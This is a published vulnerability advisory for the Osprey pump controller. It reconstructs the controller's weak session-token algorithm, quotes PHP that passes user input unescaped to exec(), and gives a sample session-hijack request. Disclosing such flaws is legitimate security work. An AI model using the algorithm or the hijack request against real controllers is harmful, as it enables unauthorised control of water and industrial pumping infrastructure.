Osprey Pump Controller 1.0.1 – Predictable Session Token / Session Hijack

  • 作者: LiquidWorm
    日期: 2023-04-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51297/
  • # Exploit Title: Osprey Pump Controller 1.0.1 - Predictable Session Token / Session Hijack
    # Exploit Author: LiquidWorm
    
    
    Vendor: ProPump and Controls, Inc.
    Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com
    Affected version: Software Build ID 20211018, Production 10/18/2021
    Mirage App: MirageAppManager, Release [1.0.1]
    Mirage Model 1, RetroBoard II
    
    
    Summary: Providing pumping systems and automated controls for
    golf courses and turf irrigation, municipal water and sewer,
    biogas, agricultural, and industrial markets. Osprey: door-mounted,
    irrigation and landscape pump controller.
    
    Technology hasn't changed dramatically on pump and electric motors
    in the last 30 years. Pump station controls are a different story.
    More than ever before, customers expect the smooth and efficient
    operation of VFD control. Communications—monitoring, remote control,
    and interfacing with irrigation computer programs—have become common
    requirements. Fast and reliable accessibility through cell phones
    has been a game changer.
    
    ProPump & Controls can handle any of your retrofit needs, from upgrading
    an older relay logic system to a powerful modern PLC controller, to
    converting your fixed speed or first generation VFD control system to
    the latest control platform with communications capabilities.
    
    We use a variety of solutions, from MCI-Flowtronex and Watertronics
    package panels to sophisticated SCADA systems capable of controlling
    and monitoring networks of hundreds of pump stations, valves, tanks,
    deep wells, or remote flow meters.
    
    User friendly system navigation allows quick and easy access to all
    critical pump station information with no password protection unless
    requested by the customer. Easy to understand control terminology allows
    any qualified pump technician the ability to make basic changes without
    support. Similar control and navigation platform compared to one of the
    most recognized golf pump station control systems for the last twenty
    years make it familiar to established golf service groups nationwide.
    Reliable push button navigation and LCD information screen allows the
    use of all existing control panel door switches to eliminate the common
    problems associated with touchscreens.
    
    Global system configuration possibilities allow it to be adapted to
    virtually any PLC or relay logic controlled pump stations being used in
    the industrial, municipal, agricultural and golf markets that operate
    variable or fixed speed. On board Wi-Fi and available cellular modem
    option allows complete remote access.
    
    Desc: The pump controller's ELF binary Mirage_CreateSessionCode.x contains
    a weak session token generation algorithm that can be predicted and can aid
    in authentication and authorization bypass attacks. Further, session hijacking
    is possible due to MitM attack exploiting clear-text transmission of sensitive
    data including session token in URL. Session ID predictability and randomness
    analysis of the variable areas of the Session ID was conducted and discovered
    a predictable pattern. The low entropy is generated by using four IVs comprised
    of username, password, ip address and hostname.
    
    Tested on: Apache/2.4.25 (Raspbian)
     Raspbian GNU/Linux 9 (stretch)
     GNU/Linux 4.14.79-v7+ (armv7l)
     Python 2.7.13 [GCC 6.3.0 20170516]
     GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git
     PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    Macedonian Information Security Research and Development Laboratory
    Zero Science Lab - https://www.zeroscience.mk - @zeroscience
    
    
    Advisory ID: ZSL-2023-5745
    Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5745.php
    
    
    05.01.2023
    
    --
    
    
    sessionCode algorithm:
    ----------------------
    
    for i in range(0, 80):
    foo = ord(userName[i]) + ord(userpassWord[i]) + ord(clientIP[i]) + ord(clientHost[i])
    bar = foo + 7
    if bar < 64 && bar > 57:
    bar = foo + 13
    while bar > 90:
    bar = bar - 43
    if bar < 64 && bar > 57:
    bar = bar - 37
    sessionCode[i] += chr(bar)
    if sessionCode[i] == chr('\a'):
    sessionCode[i] = 0
    break
    
    print(sessionCode.upper())
    
    
    index.php (+cmdinj):
    --------------------
    
    $dataRequest=$userName." ".$userPW." ".$client_IP." ".$client_HOST;
    $test=exec("Mirage_CreateSessionCode.x ". $dataRequest,$outData, $retVal);
    
    
    Session ID using user:password,ip,host
    8GS1@7DB@7@@D5DKOPA@4DU4SKNH@OPNACI5JAP
    Session ID using admin:password,ip,host
    @DDUDFDIH@@@D5DKOPA@4DU4SKNH@OPNACI5JAP
    First 10 bytes are the user/pass combo.
    
    Hijack session:
    ---------------
    
    GET /menu.php?menuItem=119&userName=user&sessionCode=QKC1DHM7EFCAEC49875@CPCLCEGAP5EKI